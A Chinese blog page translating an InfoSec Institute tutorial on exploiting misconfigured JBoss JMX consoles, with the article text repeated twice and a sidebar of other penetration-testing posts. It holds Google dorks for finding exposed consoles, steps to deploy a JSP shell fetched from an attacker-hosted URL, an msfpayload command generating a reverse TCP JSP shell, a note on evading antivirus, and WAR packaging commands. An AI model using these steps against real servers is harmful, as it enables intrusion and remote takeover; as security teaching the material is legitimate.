- 浏览: 287968 次
文章分类
- 全部博客 (276)
- burp+hydra暴力破解 (1)
- kali linux工具集 (6)
- kali (59)
- linux (54)
- password (14)
- web (63)
- 渗透测试 (50)
- windows (40)
- metasploit (9)
- 信息收集 (32)
- burp suit (4)
- 安全审计 (9)
- https://github.com/secretsquirrel/the-backdoor-factory (0)
- nmap (4)
- arachni (2)
- 工具 (5)
- sql (3)
- 网络 (2)
- 后渗透测试 (10)
- 内网 (5)
- 无线 (2)
- C (3)
- bios (1)
- RoR (12)
- mongodb (1)
- linxu (1)
- gdb (1)
- linux,虚拟化 (1)
- python (4)
最新评论
原文地址:http://resources.infosecinstitute.com/jboss-exploitation/
JBoss Application Server是一个基于Jave EE的web应用服务器。如果Jboss没有正确配置,它会允许攻击者进行各种恶意攻击。由于JMX console可以通过端口8080远程访问,攻击者和恶意用户可以通过使用Jboss console中的DeploymentScanner功能部署他们自己的WAR(web archive)文件或shell脚本。
通过Google dorks找到的一些jmx-console
intitle:”jboss management console” “application server” version inurl:”web-console”
intitle:”JBoss Management Console – Server Information” “application server” inurl:”web-console” OR inurl:”jmx-console”
inurl:jmx-console/HtmlAdaptor
虽然虽然大多数的Jboss服务器对于jmx-console都有默认的认证,但是没有限制访问控制台和web管理接口,这些将会让攻击者绕过认证从而获得管理员访问权限。
下图为从Google dorks中找到的jmx-console,它需要密码访问。
然后我们需要一个jsp shell
为了部署恶意文件,我们将会使用jmx console中的DeploymentScanner ,通过增加一个新的url,这个url用于存储我们上传的文件,addURL()命令可以用过添加一个url到应用/shell,然后可以从url获取这个应用。
然后等待DeploymentScanner部署文件,接下来就可以访问我们的shell了。在部署之前,我们需要上传我们的shell到网站,例如http://www.malicious website.com/files/cmd.jsp。然后我们需要通过控制台访问DeploymentScanner来部署。一旦url被添加,我们就可以唤醒函数。
在上图中,我们点击button来激活函数。然后应用程序返回一个成功的消息。可以使用metasploit来创建一个更加稳定的jspshell:
可以生成一个jsp shell,还可以进一步修改来绕过AV。一旦shell上传到服务器,通过msfconsole来开启Metasploit multi handler。访问上传的shell,你将会在msfconsole中看到一个新的session。
如果打算直接从控制台上传jsp shell,那么有时可能需要将jsp文件打包成war文件。使用下列指令:
1. 安装最新的Java SDK,可能要求重启
2. 把cmd.jsp拷贝到工作目录,然后创建一个叫web-inf的子文件夹
3. 把下列代码放到WEB-INF/web.xml文件中:
在Windows中,使用下列命令打包
“C:Program Files (x86)Javajdk1.6.0_26binjar.exe” cvf cmd.war WEB-INF cmd.jsp
也可以使用Kingcope 来实现。
JBoss Application Server是一个基于Jave EE的web应用服务器。如果Jboss没有正确配置,它会允许攻击者进行各种恶意攻击。由于JMX console可以通过端口8080远程访问,攻击者和恶意用户可以通过使用Jboss console中的DeploymentScanner功能部署他们自己的WAR(web archive)文件或shell脚本。
通过Google dorks找到的一些jmx-console
intitle:”jboss management console” “application server” version inurl:”web-console”
intitle:”JBoss Management Console – Server Information” “application server” inurl:”web-console” OR inurl:”jmx-console”
inurl:jmx-console/HtmlAdaptor
虽然虽然大多数的Jboss服务器对于jmx-console都有默认的认证,但是没有限制访问控制台和web管理接口,这些将会让攻击者绕过认证从而获得管理员访问权限。
下图为从Google dorks中找到的jmx-console,它需要密码访问。
然后我们需要一个jsp shell
为了部署恶意文件,我们将会使用jmx console中的DeploymentScanner ,通过增加一个新的url,这个url用于存储我们上传的文件,addURL()命令可以用过添加一个url到应用/shell,然后可以从url获取这个应用。
然后等待DeploymentScanner部署文件,接下来就可以访问我们的shell了。在部署之前,我们需要上传我们的shell到网站,例如http://www.malicious website.com/files/cmd.jsp。然后我们需要通过控制台访问DeploymentScanner来部署。一旦url被添加,我们就可以唤醒函数。
在上图中,我们点击button来激活函数。然后应用程序返回一个成功的消息。可以使用metasploit来创建一个更加稳定的jspshell:
root@bt:~# msfpayload java/jsp_shell_reverse_tcp LHOST=192.168.1.1 LPORT=8080 R > infosec.jsp
可以生成一个jsp shell,还可以进一步修改来绕过AV。一旦shell上传到服务器,通过msfconsole来开启Metasploit multi handler。访问上传的shell,你将会在msfconsole中看到一个新的session。
如果打算直接从控制台上传jsp shell,那么有时可能需要将jsp文件打包成war文件。使用下列指令:
1. 安装最新的Java SDK,可能要求重启
2. 把cmd.jsp拷贝到工作目录,然后创建一个叫web-inf的子文件夹
3. 把下列代码放到WEB-INF/web.xml文件中:
version=”1.0″ ?> <web-app xmlns=”http://java.sun.com/xml/ns/j2ee” xmlns:xsi=”http://www.w3.org/2001/XMLSchema-instance” xsi:schemaLocation=”http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd” version=”2.4″> <servlet> <servlet-name>Command</servlet-name> <jsp-file>/cmd.jsp</jsp-file> </servlet> </web-app>
在Windows中,使用下列命令打包
“C:Program Files (x86)Javajdk1.6.0_26binjar.exe” cvf cmd.war WEB-INF cmd.jsp
也可以使用Kingcope 来实现。
发表评论
-
linux 安装scrapy
2015-09-07 13:06 602由于scrapy对python3支持不是很好,所以使用pyth ... -
nginx reverse proxy cofinguration
2015-08-28 15:18 417based on our case, we need to h ... -
wpscan
2015-08-01 10:39 435https://www.digitalocean.com/co ... -
[转]Tunneling Data and Commands Over DNS to Bypass Firewalls
2015-07-13 20:44 482https://zeltser.com/c2-dns-tunn ... -
arachni-web-ui使用
2015-06-10 01:04 2146最近在玩儿arachni,想试试arachni-ui-web, ... -
HACKING NODEJS AND MONGODB
2015-06-04 23:52 342http://blog.websecurify.com/201 ... -
php object inject
2015-05-29 00:45 339解释: http://securitycafe.ro/2015 ... -
[转]Forcing XXE Reflection through Server Error Messages
2015-05-19 01:10 453原文地址:https://blog.netspi.com/fo ... -
CVE-2011-2461
2015-03-31 01:19 430http://blog.nibblesec.org/2015/ ... -
[译]从配置错误的web server中dump git数据
2015-03-26 01:07 583原文地址:https://blog.netspi.com/du ... -
[译]解密MSSQL密码
2015-03-26 00:43 2876原文地址: https://blog.ne ... -
自动化Man-in-the-Middle SSHv2攻击
2015-03-18 01:26 1043参考:http://www.david-guembel.de/ ... -
[转]Microsoft Access sqli
2015-03-18 00:57 437https://milo2012.wordpress.com/ ... -
[转]sqlmap注入Microsoft Access
2015-03-18 00:49 1593https://github.com/sqlmapprojec ... -
crossdomain.xml
2015-03-12 01:23 671参考: https://hackerone.com/repor ... -
[译]使用wireshark解密TLS浏览器流量
2015-03-12 00:57 4126原文地址:https://jimshaver.net/2015 ... -
xxe方法
2015-02-01 18:32 849原文地址:http://www.christian-schne ... -
owasp zed--Web Sockets
2015-01-31 01:16 644http://digi.ninja/blog/zap_web_ ... -
memcached
2015-01-25 01:56 0http://www.sensepost.com/blog/4 ... -
[译]linux使用软连接读取本地文件
2015-01-25 00:28 1973原文地址:http://josipfranjkovic.blo ...
相关推荐
在过去的几年中,由于其广泛使用,JBoss也成为了黑客们的目标,存在一些安全漏洞,这些漏洞如果被恶意利用,可能会导致系统被攻击者控制、数据泄露或服务中断。本文将深入探讨JBoss的漏洞利用及其防范措施。 1. **...
最后,提供的"Struts2及jboss漏洞利用工具"可能是一个用于测试系统安全性的工具,也可能被恶意用户用来探测和利用漏洞。作为负责任的IT专业人员,我们应只在授权的环境中使用此类工具,并且仅用于合法的安全评估和...
漏洞利用工具如压缩包中的"jbosscve-2017-12149",是安全研究人员或渗透测试者用来检测和测试系统是否受到该漏洞影响的工具。这些工具通常包含精心设计的恶意序列化数据,以及用于触发和验证漏洞利用的脚本。它们...
【JBoss 漏洞利用总结】 JBoss 是一款基于 J2EE 的开源应用服务器,遵循 LGPL 许可,允许在商业应用中免费使用。它主要作为 EJB 容器和服务器,支持 EJB 1.1、2.0 和 3.0 规范。虽然 JBoss 核心服务不包含 Web 容器...
jboss中间件的反序列化漏洞检测工具,可检测主机搭建的中间件并获得shell
帮助修补JBOSS安全漏洞,防止别人黑进你的服务器。
jboss利用里添加一键getshell功能,利用的是jboss的热部署功能,直接部署一个war包,一键返回一个菜刀shell 3. 反弹shell部分更完美,不再加载远程war包,直接发包完成反弹。 4. jboss回显执行命令部分利用异常抛出...
然而,由于其复杂性和广泛使用,JBoss 成为了黑客和安全研究人员关注的焦点,因为其中可能存在可被利用的安全漏洞。 GetShell 工具,正如其名,是一种用于获取远程服务器控制权的工具,通常在安全测试和漏洞利用中...
2. jboss利用里添加一键getshell功能,利用的是jboss的热部署功能,直接部署一个war包,一键返回一个菜刀shell 3. 反弹shell部分更完美,不再加载远程war包,直接发包完成反弹。 4. jboss回显执行命令部分利用异常抛...
这种漏洞主要源于JMX-Console和Web-Console默认账户的安全隐患,被蠕虫病毒利用,导致网络拥塞、异常进程和文件生成。蠕虫病毒通过端口扫描工具pnscan大量发送请求,占用网络资源,并可能在系统中创建恶意定时任务和...
该工具可能包含了构造恶意序列化数据的方法,以及利用漏洞获得shell的方法。在进行渗透测试时,这些工具可以帮助安全专家找出系统的脆弱点,以便及时修复,防止真实攻击发生。 为了防范此类漏洞,建议采取以下措施...
jboss利用里添加一键getshell功能,利用的是jboss的热部署功能,直接部署一个war包,一键返回一个菜刀shell 3. 反弹shell部分更完美,不再加载远程war包,直接发包完成反弹。 4. jboss回显执行命令部分利用异常抛出...
标题"Java反序列化漏洞利用工具.zip"表明该压缩包内包含了针对Java反序列化漏洞的利用工具,特别提到了针对JBOSS和WebLogic两个流行的Java应用服务器。JBOSS和WebLogic都是企业级的应用服务器,广泛用于部署各种业务...
2. jboss利用里添加一键getshell功能,利用的是jboss的热部署功能,直接部署一个war包,一键返回一个菜刀shell 3. 反弹shell部分更完美,不再加载远程war包,直接发包完成反弹。 4. jboss回显执行命令部分利用异常抛...
在标题提及的“Java反序列化漏洞之Weblogic、Jboss利用之payload生成工具”中,我们可以看到这涉及到两个知名的Java应用服务器——WebLogic和JBoss。这两个服务器广泛用于企业级应用部署,而反序列化漏洞可能导致...
中间件漏洞部分涵盖了Apache Struts2、Weblogic、Jboss、Tomcat、ElasticSearch、Apache家族、Fastjson和WSO2等多个中间件的漏洞。这些漏洞可能会导致远程代码执行、数据泄露和服务崩溃等问题。 OA漏洞部分涵盖了...
定期更新到最新版本,修复已知的安全补丁,以及对部署的应用程序进行安全审计,是防止JBoss中间件被利用的关键措施。 为了保护系统免受JBoss中间件漏洞的影响,管理员应: 1. **保持更新**:及时升级到最新的JBoss...